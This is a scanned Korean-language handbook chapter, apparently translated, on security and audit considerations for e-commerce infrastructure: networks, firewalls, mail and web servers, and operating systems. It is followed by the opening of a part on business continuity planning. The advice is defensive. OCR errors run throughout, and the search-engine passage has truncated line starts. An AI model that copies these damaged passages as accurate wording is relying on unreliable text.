히 처 리하지 못하면 소비 자에게 적 당치 않은 책 임을 전가할수도 있다. 다시 말하면 송달 
오유는 상품을 잃게 하거나 지출을 증가시킨다. 

구성과 변경조종환경 을 평 가할 때 에는 다음의 사항을 고려하여 야 한다. 

• 응용프로그람코드변경 과 조작체 계변경 을 다 포함하는 쏘프트웨 어출하판변경통제 

및 판본통제 

• 빨리 발전하는 오늘의 세 계 에서 안전한 조작환경 을 유지할수 있는가，변경 처 리 
를 자동화할수 있는가. 

• 개발，실현 및 이전 ( migration ) 표준 

접속 성 


접속성은 구체적으로 공공망과 개별망에로의 망접속성，리용가능한 대역너비를 어떻 
게 계산하며 망이 어떻 게 설계되는가를 정 립하는데 리용되는 기 술과 관련된다. 전자상업 
거래는 소비자들이 Web 싸이트를 특히 겨울휴가때 리용할수 있도록 망설계를 잘했는가와 
충분한 수용능력이 있는가에 의존한다. 

이것은 충분한 인터네트접속속도와 수용능력 을 의 미 하며 또한 전자상업거 래설계 에 서 
는 그만한 접속속도와 수용능력을 가진 회사망에로의 접속을 의미한다. 많은 망설계가들은 
자기 분야에서는 주도자이지만 충분한 망수용능력에 대해서는 쉽게 무시하는 경향이 있다. 

망이 지 나치게 큰 수용능력과 기 타 자원들을 가지고 지 나치게 크게 구성되면 필요없 
이 회사자원을 랑비하게 된다. 기업들은 시장거래와 판매계획을 세우고 예상되는 통화량 
을 처 리하며 수요가 증가할 때 마다 규모를 적 절 하게 조절 할수 있는 유능한 기 술경 영 자와 
망설계가들을 가지고 있어야 한다. 

망설계가들은 전자상업거래싸이트를 적당한 위치에 배치하여야 한다는것을 리 해 하여 
야 한다. 이것은 만일 망을 세계적 규모로 운영하려 고 할 때 소비 자들에게 최 량의 신속성 
과 성능을 담보하도록 여러 위치에 배치하는것을 고려하여야 한다는것을 의미한다. 이것 
은 공정에서 환경의 복잡성을 증대시킬수 있고 나아가서 철저한 계획화에 대한 의존성을 
증대 시 킨 다. 

그 계 획화부분에 는 여 유계 획화도 포함되 는데 그것 은 비 상사태 와 기 업 지속계획화의 
부분으로 된다. 만일 어떤 리유로 하여 하나의 요소나 위치를 리용할수 없게 된다고 하 
여 도 존재 를 유지할수 있고 전자상업거 래기 업의 운영 을 계속할수 있다. 

소비 자들은 전자상업거 래환경과 거래할 때 긍정적이면서도 고무적 인 경험을 엄고 싶 
어 한다. 이 런 경험을 제공하지 못하면 회 사싸이트의 직결존재에 부정적 인 후과가 초래 
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된다. 이것은 회사가 전자상업거래를 처리할수 있게 준비되여 있지 않다는 인식을 줄수 
있으며 소비자들은 마지 못해 싸이트와 거래를 진행하게 된다. 

망접속성과 관련하여 다음의 사항들을 잊지 말고 고려하여야 한다. 

• 전자상업거래싸이트의 위치 

• 망수용능력 

• 망리용가능성의 유지 및 감시 

• 망위 상구조 

• 망의 여유 

• 보안 

• 송신련결점들이 얼마나 안전한가 

• 절환된 망을 리용할수 있는가 

• 전자상업거래송달에서 어떤 형식의 가상개별망 ( VPN ) 이 리용되는가 

보 안 


보안분야를 구성하는 네 가지 의 주요한 요소들은 다음과 같다. 

1. 접속의 의뢰기측 혹은 사용자측 

2. 망전송체계 

3. 전송하는 동안의 망정보보호 

4. 사용자식별과 인증 

전자상업거래의 하부구조에 상주하고 있는 망보안요소 및 를퓨터체계를 보호하는것 
은 자료의 무결성 을 보호하며 법 률적 인 그리 고 최 량의 실 천적 인 요구를 만족시키 는 주요 
부분이 다. 이 보호준위 는 각이한 수단을 통하여 실 현되 는데 그 수단들은 협 동적 으로 동 
작하여 방위심 도를 보장해 야 한다. 



그림 37-4. 보호준위 
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의회기측(사용자) 

의뢰기는 자기의 Web 열 람기 를 통하여 전자상업거 래의 하부구조와 호상작용한다. 그 
러나 사용자들은 그 호상작용이 어떻게 보이고 작용하며 그리고 자기들의 콤퓨터에서 어 
떻게 실행되는가에 대 하여 일정한 기대를 가지고 있다. 경험 이 긍정적 인것으로 되자면 
설계，개 발 및 실현단계 에서 일정한 프로그람작성 을 고려하여 야 한다. 

사용자들이 가지고 있는 경험은 열람기실현방식에 따라 서로 다를수 있으며 다른 열 
람기 에 의하여 지 원되 지 않는 열 람기확장지원을 선정 하는것 은 좋은 기 업 결정 이 아니 다. 
동적 인 HTML 과 그라프적내 용들용 리용되 는 각이한 Web 열 람기 와 량립 되 여 야 한다. 전자 
상업 거 래응용프로그람은 이 요구조건을 고려하여 야 한다. 모든 사용자들이 Cookie , Java , 
Java Script 와 같은 열람기에서의 확장된 특성들을 허용하려고 하지는 않는다. 이것은 응 
용프로그람설계에서 제공될수 있는 기능에 영향을 준다. 

봉사를 리 용하는 사용자와 기 업 들이 인터네 트에 직 접 접 속되 지 않을수도 있 다. 그들 
은 대 리 자봉사기 를 리용하여 보안을 제 공하거 나 또는 망요청 을 완충시 킬 수도 있 다. 또한 
저속의 망련결을 리용할수도 있다. 이 인자들도 긍정 적 인 경 험을 유지 하기 위하여 설계 
에 포함되여 야 한다. 

의뢰기측문제를 고찰할 때 에는 다음의 사항에 주의를 돌려야 한다. 

• 어떤 형태의 Web 열람기와 대리자봉사기가 리용되고 있으며 동작환경이 어떤가 
를 조사하는것 

• 소비자가 전자상업거래접근을 어떻게 등록하는가를 관단하는것 

• 전자상업거 래대 면부리용의 용이성 을 판단하는것 

• 대면부개발에 어떤 응용프로그람이 리용되는가를 확인하는것 

방화벽 

방화벽은 전자기업구조의 필수불가결의 부분이다. 보호가 없이 인터네트에 직접 접 
속된 임의의 를퓨터는 회 생호스트로 인정된다. 어떤 점 에서 그 콤퓨터는 취 약성 을 가지 
게 될것 이 다. 방화벽리 면에 모든것 을 숨겨 놓는것 은 불합리 하며 인터 네 트에 직 접 보여 
줄 필요가 없는 매 개 체 계는 방화벽 에 의하여 보호되 여 야 한다. 그리 고 보호되지 않은 
임의의 체계는 방화벽을 통과하여 회사망에 직접 접속되지 말아야 한다. 

그러 나 비 무장지 대 ( DMZ ) 와 봉사망들을 리용함으로써 망설 계 에서 방화벽 은 강화될수 
있다(그림 37-6). DMZ 는 경로기안에 있는 려과기와 접근조종목록을 통하여 체계를 보 
호한다. 봉사망은 방화벽에 련결된 개별적인 망이다. 직접적인 인터네트접속을 요구하지 
않으며 회사망에 있을 필요가 없는 임의의 체계는 봉사망에 놓인다. 

소비자는 DMZ 에 있는 체계와 호상작용한다. 소비자에게 경험을 제공하는데 필요한 
추가적인 봉사는 봉사망에 들어 있는 체계에 의하여 보장된다. 회사망의 체계로부터 회 
복되 여 야 할 임의의 보충적 인 정 보는 중간봉사기들에 의하여 회 복된다. 이것은 지 나치게 
복잡한 배 렬구조인것 같지 만 설계 상 보안정 도가 아주 높다. 방화벽밖의 체 계 들은 회 사 
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전자상업거래 봉사기의 보안 


전자상업거래봉사기는 기업봉사를 제공하기 위하여 접속된 다양한 모든 요소들로 구 
성되여 있다. 매개 체계를 철저히 보안하는 기회들을 리용할 목적으로 임의의 단일체계 
의 복잡성 을 감소시키는데 여 러개의 체 계 들이 리 용된다. 이 봉사에는 HTTP 나 Web 봉사 
기 자체，개 별화체 계 들，등록부체 계 들, 전자우편관문들 그리 고 인증체 계 들이 포함된 다. 

디렉터리봉사 

디렉터리봉사는 등록된 사용자들과 그들의 련관정보를 담은 직결보관소를 유지하는 
기 능을 제 공한다. 그 정 보에 대 한 중심보관소를 리용함으로써 사용자에 관한 인증자료나 
정보를 요구하는 임의의 체계들이 그것에 접근할수 있다. 그리고 응용프로그람들은 인쇄 
정 보를 주문하거 나 요청할 때 혹은 생 산품을 사용자들에 게 운반할 때 사용자들의 우편정 
보를 비롯한 사용자에 관한 정보를 요구할수 있다. 

여러개의 디렉터리체계들을 리용할수 있지만 X .500 과 경량디렉터리접근규약 ( LDAP ) 
에 기 초한 체 계 들이 가장 높은 준위 의 통합과 리용성 을 제 공한다. 

사용자에 관한 모든 정보들은 중앙보관소에 보관되여 있기때문에 그 체계들에 있는 
정보를 보호하며 그 자료에 대한 인증되고 안전한 전송통로를 제공하는데 특별한 주의를 
돌려야 한다. 보관소는 리용성 이 높아야 하며 많은 체 계 들은 요청 을 받을 때 정 보를 제 
공할수 있는 보관소의 능력에 의존할것이다. 앞에서 언급한것처럼 자료의 통합정리는 정 
보가 보관될 때와 망을 통하여 전송되는 사이에 경영관리자들이 더 쉽게 신뢰성을 보장 
하고 무결성을 유지할수 있게 한다. 한편 자료를 통합정 리하면 체계 가 공격목표로 되지 
않겠는지 하는 위구심을 가질수 있다. 그러나 집중화는 망보안전문가들에게 체계를 보호 
할수 있는 기회를 보장한다. 

제공된 디렉터리봉사를 평가할 때 고려할 점은 다음과 갈다. 

• 얼마나 많은 자료가 보관되는가. 

• 얼마나 빠른 디렉터리응답을 보장하여야 하는가. 

• 단번 에 얼 마나 많은 디 렉 터 리 질 문을 처 리 할수 있 는가. 

• 디렉터리에 어떤 보안기능이 통합되는가. 

• 디 렉 터 리 가 인증된 접 속을 지 원 하는가. 

• 소비자가 그 자료가 보관되는 중이 라는것을 아는가. 

우편봉사기 

전자우편은 임의의 전자상업거래하부구조에서 기본구성요소로 된 다. 전자우편은 전 
자상업거래하부구조체계로부터 사용자나 기 업에 정보를 송달한다. 소비 자들은 전자우편 
에 의거하여 정 보를 요청하며 질문이 나 문제 가 제 기될 때 에는 소비 자봉사 혹은 후원자들 
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과 상담한다. 전자우편은 또한 소비자들이 경험에 대하여 좋다 아니면 좋지 않다는것을 
통지하는데도 리용될수 있다. 전자우편은 많은 용도에 리용되지만 특별한 보안을 요구하 
는 정보의 전송통로로는 리용되지 말아야 한다. 전자우편을 통하여 전송된 정보는 우편 
만큼 공개적이다. 따라서 신용카드와 구입정보는 물론 사용자이름과 암호는 전자우편을 
통해서는 류통되지 말아야 한다. 이것은 S / MIME 와 같은 암호화기술에 의해서만 가능하 
며 안전하게 될수 있다. 

우편봉사기의 운영은 하부구조운영에서 관건적이다 . 전자우편봉사기들은 또한 해커 
들이 다른 체계들에 접근하거 나(흔히 기본보안위험으로 간주되지 않는) 대용량의 비요청 
전자우편물들을 산포 하기 위하여 흔히 리 용한다. 현재 리 용할수 있 는 상업 적 우편봉사기 
들가운데서 많은것 들은 정 보를 보호하고 공개할수 있는 그 구조와 관계 되 는 특징 을 가진 
다. 외부사용자가 자기가 회사직원인듯이 전자우편을 발신하거나 혹은 다른 우편봉사기 
들에 전자우편문서 를 중계하는 우편봉사기 를 리 용하여 전자우편을 발신하도록 잘못 설정 
된 우편봉사기도 있다는것을 생각해 야 한다. 

이런 실례들은 보안업계 에서 매일과 같이 보고서로 작성발표되는데 그것은 
일 반적 으로 간단한 설 정 상오유와 낡은 쏘프트웨어 의 리용 혹은 쏘프트웨 어보강수정 판본 
으로 갱신하지 않는것과 관계된다. 

전자우편의 보안과 리용성 을 고찰할 때 고려할 점은 다음과 같다. 

• 어 느 우편송달대 리 자 ( MTA ) 와 우편사용자대 리 자가 리 용되 고 있는가. 

• 우편송달대 리 자의 설정파일에 대 한 접근허 가 

• 비 법리용가능성을 판단하기 위한 우편봉사기의 송달 및 오유 

• 운영기 록의 주기 적 인 조사 

• 다양한 공격 에 대한 취약성을 검사하기 위하여 MTA 의 일반적인 《 해커용약 
점》을 조사하는것 

• 비 루스방지 기 술의 리 용평 가 

• 내용관리와 암호화기술 

Web 봉사기 

Web 봉사기는 전자상업거래하부구조에서 가장 관건적 인 요소로 간주되고 있다. 사용자 
에게 Web 에서 볼수 있는 내용들을 송달하고 사용자나 다른 체계들에 정보를 회복시키거나 
보내 는 프로그람을 실 행 하며 요청 의 유효성 을 판단하기 위 한 특수한 검 사를 진행할것 이 
요구된다. Web 봉사기는 언제 나 리용할수 있고 허용시 간내 에 사용자의 요청 에 응답할수 있 
어 야 한다. 만일 망이 불완전하거 나 Web 봉사기의 성능이 좋지 못한 탓에 사용자들이 기 다 
려 야 한다면 그들은 즉시 그 싸이트를 포기할것 이 다. 사용자들도 또한 그 기업에 대하여 
부정 적 인 인식 을 가지 게 될것 이 고 다시 는 그 싸이 트를 리 용하려 고 하지 않을것 이 다. 

많은 Web 봉사기 들은 상업 적 쏘프트웨어，무료쏘프트웨어 들을 리 용할수 있다. 가능하 
다면 문제가 제기되 여 쏘프트웨어 에 대 한 판매회사의 보수작업 이 필요한 때 에는 상업적 
인 실현형 태 를 구입하여 신속히 지 원을 받을수 있 다. 무료쏘프트웨어 인 경 우 초기 지 출이 
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작을수 있고 그것들이 매우 견고할수는 있지만 설치후 수리 및 지원원가는 대단히 높을 
수 있다. 회사가 파산되였거나 자유롭게 사용하는 설비를 관리하는 전문가들이 은퇴한 
경우를 고찰하자. 이 경우에는 그 설비에 정통한 사람을 찾기보다 상업적인 쏘프트웨어 
에 유능한 전문가를 찾는것이 훨씬 더 쉬울것이다. 

Web 봉사기 자체 를 구성 하는데 는 응용프로그람의 설 계 와 Web 내 용에 대 한 개 발규격 이 
필요하다. Web 봉사기쏘프트웨어는 어떤 특수한 허가나 혹은 행정적 인 허 가가 필요한 체 
계 에서 실행 되지 말아야 한다. 그래 야 공격 자가 봉사기의 신용을 떨어 뜨리 기 위하여 행 
정적인 우선권을 획득할 위험성이 감소된다. 

봉사기의 운영은 또한 응용프로그람들과 문서양식들에로의 접근을 보장하는 CGI 스 
크립트 들의 리용가능성에도 의존된다. CGI 프로그람들은 보안과 관련한 문제를 일으키는 
잘못 쓴 코드가 나타나지 않는다는것을 담보하기 위하여 개 발할 때 와 최종적 으로 공개하 
기전에 세밀히 조사되여야 한다. 비밀성과 무결성에 대하여서는 여러번 언급되였다. Web 
봉사기는 안전소케트층 (SSL) 이나 전송층보안 (TLS) 을 통하여 암호화된 론리적련결을 제공 
할수 있 어 야 한다. SSL 과 TLS 는 다 추가적 인 하드웨 어 를 요구하지 않으며 다 봉사기측 
인증서를 리용한다. 싸이트에 대한 인증서의 발행은 이 론문의 범위를 벗어 난다. 여러 
신뢰 회 사들이 Web 봉사기 에 대 한 인증서 를 발행할수 있 다. 

SSL 이 나 TSL 에 의하여 기 관과 소비 자는 현시되거 나 전송되는 정 보가 망을 통과하는 
동안에 보호되고 있다는 확신을 가질수 있다. 

Web 봉사기 와 관련 하여 다음의 사항들을 고려하여 야 한다. 

• Web 봉사기가 가동하는 환경에서의 사용자正)허가와 구좌허가를 검토하는것. 

• 어 느 Web 싸이트가 공적 인것 이 고 어 느것 이 접 근이 통제 되 는것 인 가를 판별 하는것 . 

• HTML 문서들， ASP 와 CGI, 디렉터리들과 스크립트들에 대한 접근허가를 분석 하 
는것 . 

• 마이 크로쏘프트 ns 혹은 다른 Web 봉사기 응용프로그람구성 과 운영 기 록파일들을 
조사하는것. 

• Web 봉사기 에 의하여 열 람기의 접수된 요청들이 어떻게 확인되는가를 결정하는것. 

• 후단처리장치에 전송된 요청들이 어떻게 확인되는가를 결정하는것. 

• Java, JavaScript, XML 을 포함하여 Web 에 기 초한 응용프로그람 및 자료기지접 속 
성을 조사하는것. 

• 잘 알려 져 있는 ASP 와 CGI 스크립트 그리고 보안위험이 있는 편의프로그람이 
존재하는가를 검사하는것. 

• Web 및 대 리 자봉사기 구성파일 들을 조사하는것 . 

• SSL 통신을 가능하게 하는 Web 봉사기 구성파일 과 인증서 들을 검 사하는것 . 

• 전 자상업 거 래 봉사에 서 리 용가능성 이 높은 요소들을 분석 하는것 . 

• 관건적 인(중심 ) 봉사기 의 조작체 계 와 Web 쏘프트웨 어 패 치 준위 그리 고 구성 파일 
들을 평가하는것. 

• 응용프로그람패 치준위 와 구성파일 을 평 가하는것 . 

• 외부적 인 전자상업거 래체계들이 내부체계 에 어떻게 인증되 는가를 판단하는것. 
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• 봉사인증서를 발행하고 소비자가 인증서의 확실성을 인정하게 하는 방법이 있을 
때 인증권한을 고려하는것. 

• 부인방지특성의 요구조건을 평가하는것. 

• CGI 스크립트를 평가하고 프로그람코드를 검사하는것. 

• Web 내 용관리 를 고려하는것 . 

조작체계보안 

이 미 설명 된 모든 구성 요소들은 조작체 계 가 제 공하는 기 초봉사에 의 거한다. 개 별적 
인 응용프로그람의 매개 요소들은 더 안전하게 될수 있지만 확고하면서도 안전한 기초가 
없어도 다른 노력들에 영향을 미친다. 현재 대다수의 전자상업거래체계들은 Windows NT 
혹은 UNIX 조작체계상에서 가동하고 있다. 매개 환경은 자체의 우단점과 체계의 취약성 
을 가진다. 

Windows NT 조작체계 

Windows NT 는 임의의 하부구조에서 특수한 계산과제 들을 수행하는데 리용되는 인 
기 있는 조작체계 이 다. 이 조작체계 를 정 확하게 구성하는것 이 중요하다. 만일 그것 이 정 
확하게 구성되지 않고 보안이 정확하게 실현되지 않는다면 쉽게 약화될수 있다. 

Windows NT 는 조작체 계 와 응용프로그람구성 을 설정하는 체 계관련정 보를 보관하는 
파일에 크게 의존한다. Windows NT 에서 여러개의 주요봉사는 같은 망봉사포구로 진행된 
다. 이것은 원격사용자에게 체계를 조사하고 중요한 체계관련정보를 보관하는 파일정보 
를 수집하는 능력 을 제공한다. 디 스크공유정 보，사용자이름 그리 고 체 계의 구체적 인 구성 
과 갈은 정보를 장악하면 체계 에 대 한 성공적 인 공격을 단행할수 있다. 

Windows NT 를 전자상업거래조작체계가동환경으로 사용할 때에는 

• 호스트 및 망에 기 초한 취 약성 스캐 너 를 리용하여 전 자상업 거 래봉사를 제 공하는 
모든 Windows NT 체 계 들의 스캔 을 진행할것 . 그 결 과를 분석 하고 조작체 계 에 있 
는 포구들이 인증되지 않은 접근에 람용되는가를 조사할것. 

• 불필요한 봉사 및 포구를 조사할것. 

• 중심봉사기의 체계관련정 보보관파일，조작체계패 치준위 그리 고 구성파일들을 조 
사할것. 

• 조작체 계 요소들에 대 한 구성 배 치 및 변경관리 를 평 가할것 . 

• 비루스방지기술을 실현할것. 

UNIX 조작체계 

UNIX 조작체 계 는 일 련의 각이한 과제 들을 수행하는데 리용되 는 다중사용자，다중처 
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리환경 을 제 공한다. 그러 나 Windows NT 와 마찬가지 로 보안모둘들과 조작체 계 의 부정 확 
한 구성은 그 신용을 떨구게 된다. UNIX 는 Windows NT 보다 휠씬 더 일반적인 전자상업 
거 래환경 이 다. 조작체 계 가 상대 적 으로 완성되 였음에 도 불구하고 UNIX 실 현과 관련한 새 
로운 문제 들이 주마다 발견된 다. 일 련의 조작체 계보안문제 들에 대 하여 대 중보도매 체 들에 
서 도 떠 드는것 은 그만큼 를퓨터사용체 계 가 조작체 계 에 의 존하고 있는것 과 관련된 다. 

Windows NT 와 마찬가지로 UNIX 는 안전한 조작체계지향형은 아니다. 임의의 보안전 
문가도 조작체 계 에 있는 보안체 계 를 무능하게 하는 많은 방도들을 내놓을수 있 다. 조작 
체계를 견고하게 하고 전자상업거래환경에서의 취약성을 감소시키자면 상당한 노력이 필 
요하다. 다중사용자조작체 계 로서의 UNIX 는 체계기 능의 대부분을 제공하는 망에 기초한 
많은 봉사기능을 가지 고 있다. 그 봉사와 포구들가운데서 많은것은 전자상업거 래기능을 
제공하는데 필요한것 이 아니 다. 그 봉사들은 흔히 비밀성，자료무결성 및 체계리용성에 
대 한 공격 을 개 시하는데 리 용된 다. 

UNIX 를 전자상업거 래조작체 계 로 리용할 때 에는 다음의 사항을 확인하여 야 한다. 

• 호스트 및 망에 기 초한 취 약성 스캐 너 를 리용하여 전자상업 거 래봉사를 제 공하는 
모든 UNIX 체계들을 스캔하며 그 결과를 분석하고 조작체계에서 포구들이 비법 
접근에 람용되는가를 검토하는것. 

• 불필요한 봉사와 포구들을 검토하는것. 

• 관건적 인 봉사기 들에 있는 조작체 계 보강수정 판준위 와 구성 파일 들을 평 가하는것 . 

• 조작체 계구성 요소들에 대 한 구성 및 변화관리 를 평 가하는것 . 

BackOffice 응용프로그람 


전 자상업 거 래하부구조는 상품명 세 서 를 보고 상품을 주문하기 위한 탐색엔 진， Oracle , 
BaaN , SAP 를 비 롯한 각이 한 BackOffice 응용과의 통신경 로를 가지 고 있 다. 이 체 계 들이 
충분히 보호되는것은 물론이고 망을 통하여 전송된 자료들도 충분히 보호되는것은 보호 
된 정보접근을 제한하기 위해서이다. 게다가 그 응용프로그람들과 관련한 특수한 성능 
및 보안문제들도 있다. 

탐색 엔진 

탐색엔진은 전자상업거 래환경내 에서 특별한 문서 나 Web 페지를 탐색 하는데 리용된다. 
람색엔진의 성능은 Web 경로와 폐지를 얼마나 빨리 횡 단하여 관련자료가 있는 위치에 대 
한 목록을 생 성하는가 하는데 의 존한다. 대 부분의 람색엔진들은 그 작업 을 두 단계 로 수 
행한다. 첫 단계 에 서 탐색엔 진은 Web 폐 지 들을 《 더 듬으면서》정 보를 수집한다. 두번째 
단계 에 서 람색엔진은 사용자가 탐색 을 요청할 때 사용하도록 탐색 가능한 색 인을 만든다. 

각이 한 람색 엔진들은 정 보수집 에서 각이 한 수준의 성능을 제 공한다. 이것은 사용자 
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하는 폐지들을 탐색할수 없다면 사용자는 정보가 존재하지 않는다고 생각할것이다. 
은 사용자에게 그 Web 싸이트에 대한 좋지 못한 인식을 줄수 있다. 더는 존재하지 
나 관계도 없는 정보를 포함하는 폐지들이 나타난다면 사용자는 실망하고 말것이다. 
례를 들어 그림 37—7의 그라프를 고찰하자. 두 그라프는 정확히 같은 하드웨 어상에 
동작하고 두개 의 서 로 다른 탐색엔진에 대 한 기 본체 계 의 활동을 보여 준다. 우에 있 
착1계 는 더 듬는 단계와 색 인화단계 에서 체계의 자원을 훨씬 잘 리용한다. 체계 자원들 
잘 리용한다는것은 엔진이 효과적으로 동작하고 있다는것을 의미한다. 아래그라프는 
낮은 자원리용을 보여 주며 이것 은 같은 하드웨 어 자원에 도 불구하고 표준작업 량을 
할수 없을수도 있 다는것 을 의 미한다. 

탐색엔진과 사용자의 호상작용도 매 우 중요하다. 만일 람색엔 진자체 가 정 확히 실 행 
않는다면 쏘프트웨어 나 혹은 탐색 이 진행 되 는 하드웨 어 때 문에 탐색 을 포함한 동작 
느릴수 있 다. 일부 람색엔진들은 동시 적 인 탐색 을 잘 처 리하지 못한다. 실현에 앞서 
부하검 사 (simulated load testing ) 도 해 보면서 제 품을 주의 깊게 검 토하는것 이 필요하다. 








탐색엔진을 평가할 때에는 다음의 사항을 조사하여야 한다. 

• 더듬는 기능과 색 인화기능이 얼마나 잘 동작하는가. 

• 결과본문의 성공률과의 련관성 

• CPU 와 LAN 리 용 

• 람색응답이 사용자에 게 얼마나 빨리 돌아 오는가. 

• 제작업체의 명성 

BackOffice 체 계 들은 전자상업 거 래 사용자에 게 기 관이 엄격 한 통제를 유지 하려 고 
하는 정 보를 제 공한다. 일 반적 으로 그러한 체 계 들은 회 사의 기 타 일 상업 무를 보장하 
는데도 리 용된 다. 이 체 계 들은 일 반적 으로 회 사망의 보호안에 있 으므로 보호된것 으 
로 볼수 있 다. 더 욱더 많은 사용자들과 소비 자들이 봉사 및 접 근기 술을 요구하기때 
문에 《철옹성 갈은 망울타리》라는 개념은 현실성이 더욱더 적어 지고 있다. 그러 
나 개발，응용，조작체계구성에 관하여 앞에서 제시된 모든 문제들도 여기에 적용되 
여 야 한다. 

외부전자상업거래체계로부터 이 체계들에 로의 통신은 방화벽에 의하여 조종된다. 방 
화벽은 해당한 외부체계들만이 해당한 내부체계와 통신하게 하며 따라서 공격이 있는 경 
우 총체적 인 파괴，약화위험을 최소화한다. 

접속의 실현과 이 BackOffice 체계의 보호에서 성과여부는 자료가 한 체계로부터 다 
른 체계로 어떻게 이동되는가，어떤 규약과 전송방법들이 리용되는가，누가 자료를 구축 
하는가，누가 수신를퓨터에서 그 자료를 처리하는가 그리고 정보 그자체의 기밀성에 대 
한철저한 리해에 의존한다. 

BackOffice 체계에로의 접속을 평가하고 실현할 때에는 다음의 사항들을 평가하여야 
한다. 

• 기관의 기밀자료의 보호에 대한 평가 

• BackOffice 요소들에 대 한 구성관리 평 가 

• 비루스방지기술의 리용에 대한 평가 

• 자료기지구성과 관리실천에 대한 평가 

• Web 싸이트로부터 주문관리체계에 로의 주문송달평 가 

• 주문실현과정평가 
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결 론 


이 론문에 서 는 전자상업 거 래 구조의 구성 요소들을 고찰하고 기 관이 그 환경 을 개 발하 
거나 검열준비를 할 때 무엇에 중심을 두어야 하는가를 고찰하였다. 이 론문은 결코 매 
개 기술령역에 대한 완벽한 검 토는 아니지만 전자상업거래환경을 구성하는 다양한 요소 
들사이의 관계와 의존성을 보여 주는데 목적 이 있다. 

전자상업거래환경의 실현은 임의의 회사로 하여금 경제적으로 세계적인 위치를 차지 
하며 세계시장에 성공적으로 진출할수 있게 한다. 사실상 일부 소매상인들은 전자상업거 
래의 덕택으로 벽돌과 세멘트로 지은 실지 상점건물도 거의 가지고 있지 않는다. 

모든 측면에서 남들의 눈에 띄우게 하며 기억에 남게 하는것이 아주 중요하다. 빨리 
하고 서두르고 정 확하게 하라. 그렇지 않으면 파산되 고 만다. 

이것이 전자상업거래의 본성이다. 만일 처음에 정확하게 해놓지 않으면 후에는 그것 
을 수정할 시간이 없을것이다. 이것은 전자상업거래의 미궁이다. 
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제 8 편 

업무지 속성계획 화와 재해복구계획 화 


정보체계와 정보처리의 지속성은 많은 자연적 및 인공적위협을 받고 있다. 기관들은 
잠재적인 업무파산에 대하여 항시적으로 대처하고 있어야 하며 자기들의 자동화체계에 
대한 회복계획을 검사해야 한다. 더우기 이런 기관들은 지속성계 획화공정을 계속 재구성 
해 야 하며 이때 분산형콤퓨터사용환경과 월드 와이 드 Web 등의 발전하는 기술들의 도전 
에 부닥친다. 

업 무지 속성 과 재 해 복구를 담보하기 위한 노력 은 이 미 IT 환경 에 서 하나의 도전으로 
되 였 다. 우리 는 현재 의 를퓨터사용환경 이 몇년전에 비 하여 관리 하기 가 더 복잡해 졌 다는 
것을 확신할수 있다. 체계들이 보다 더 분산됨에 따라 그 체계의 조종과 관리가능성이 
중심원천으로부터 더 욱 더 멀어지 고 있다. Web 응용세 계 에서는 많은 조종권이 자원을 
소유하고 있는 기관의 밖에 놓인다. 그리하여 관리과정에서 경영진이 지속성계획화 
( CP ) 가 중요하다는것을 잘 아는것은 응당하다. 그러 나 그 계 획을 효과적 으로 실행하지 
않고 있다. 

이 편에서 독자들은 각 기관들이 우발적인 사고에 체계적인 방법으로 대처하고 그 
가치 를 평 가하기 위한 조치 를 강구해 야 한다는것 을 알게 된 다. 업 무지 속성 계 획 화의 필 요 
성은 기관이 계속 생활력을 유지하도록 하는 중대한 체계과제들이 제때에 예비싸이트에 
서 처 리됨 으로써 업무에 심각한 영향을 주지 않도록 하자는데 있다. 이 런 중대한 처 리를 
하는 기술들은 오늘날의 요구에 부합되게 계속 갱신되고 있다. 

제39장에서는 사실자료로써 재 해복구의 기 본문제들을 강조한다. 주요한것은 지식 있 
는 정 보체 계보안전문가가 노는 중요한 역 할이 다. 
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제 3 8 장. 업무지속성계획화공정의 재구성 


칼 비 잭슨 


이 장에 대한 초판은 1999년판《정보보안관리편람》에 서술되였다. 그때로부터 전 
자상업거래가 주목을 끌게 되 였고 Web 기반기술들이 거의 모든문제 에 대 한 명백한 해결 
방안으로 되였다. 이러한 문제들에서 일치한것은 그 경향이 어떻든 기본업무처리는 거의 
변하지 않았다는것 이다. 그리고 늘 그런것처 럼 업무영향평가의 초점은 업무공정 들에 대 
한 시간을 다투는 우선권을 평가하는것이다. 이러한 최근의 현실을 고려하여 이 장이 갱 
신되였으니 독자들이 참작해주기를 바란다. 

지속성계획하: 경영진의 인식은 높지만 실행의 
효과성은 낮아 

지 속성 계 획 화 ( CP ) 과정 이 회 사의 전 반적성 공에 기 여하는 몫을 기 관이 정 확히 측정하 
지 못하였기때문에 총적 인 업무지속과정은 라선식 으로 하강해 왔다. 그 하강회전 또는 분 
해 과정은 계 획 작성，검사，유지 보수，감퇴ᅳ재계 획 작성，검사，유지 보수，감퇴ᅳ 재계획작 
성，검사，유지보수，감퇴 등으로 계속된다. 

지난시기 연구론문 《 비 상사고계 획화와 관리 지속성계 획화성능표》는 거 듭하여 지 
속성계획화가 행정관리에 《극히 중요하다》，《매우 중요하다》는 정도로 지위가 높 
아 졌 다는것 을 확정 하였 다. 가장 최 근의 《2000-2001 CPM / KPMG 지 속성계 획 화연구》는 
이러한 관찰을 명백하게 확인하였다. 이 연구는 계속 늘어 나는 CP 전문가들의 위치가 
IT 하부구조로부터 회 사관리 및 일 반관리부문으로 이 동하고 있 다는것 을 지 적하였 다. 그 
러나 IT 기관내에서의 CP 보고는 여전히 기준으로 되여 있다. 현재 약 40%의 CP 전문가 
들은 IT 에 자기사업 을 보고하고 있지 만 30%는 자기사업 을 경 영 진에 보고하고 있다. 

지속성계획화측정 

이 런 추세조사가 진행되 고 있지 만 CP 목적 에 대 한 행정경 영 진의 인식 과 그들이 가 
치 를 측정하는 방식 사이 에 는 서 로 련관되 지 못하는 점 들이 계 속 나타나고 있 었다. 
전통적 으로 CP 의 효과성 은 메인프레 임의 재 해복구실험 에서는 통과/불통과점수로 측정 
되 였 으며 예 비/보조싸이트나 예 비통신설 비인 경 우에 는 그 CP 효과성 은 그 설 비 들에 드 
는 유지비와 그 설비들의 운영으로 하여 엄어 지는 리익과의 대비로 산출하였다. 이 
런 형식의 측정기준에서 문제점은 그것들이 단지 CP 의 직접적비용을 측정하거 나 또는 
시험 이 효과적으로 진행되 였는가에 대한 간접적 인식을 측정하는것 이 다. 이런 측정 량들 
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은 검사가 정확한 하부구조요소를 확인하였는지 또는 구성부분을 고장날 때까지 철저 
히 검사하였는지 명백히 밝혀 놓지 못함으로써 그 검사환경의 범위와 리용성한계를 
굿지 못한다. 

따라서 우리는 리용할수 있는 정확한 측정방법에 대하여 질문할수도 있다. 재정적인 
측정은 CP 공정에 대한 하나의 측정량으로 되지만 CP 가 기관에 기여하는 정도를 질과 
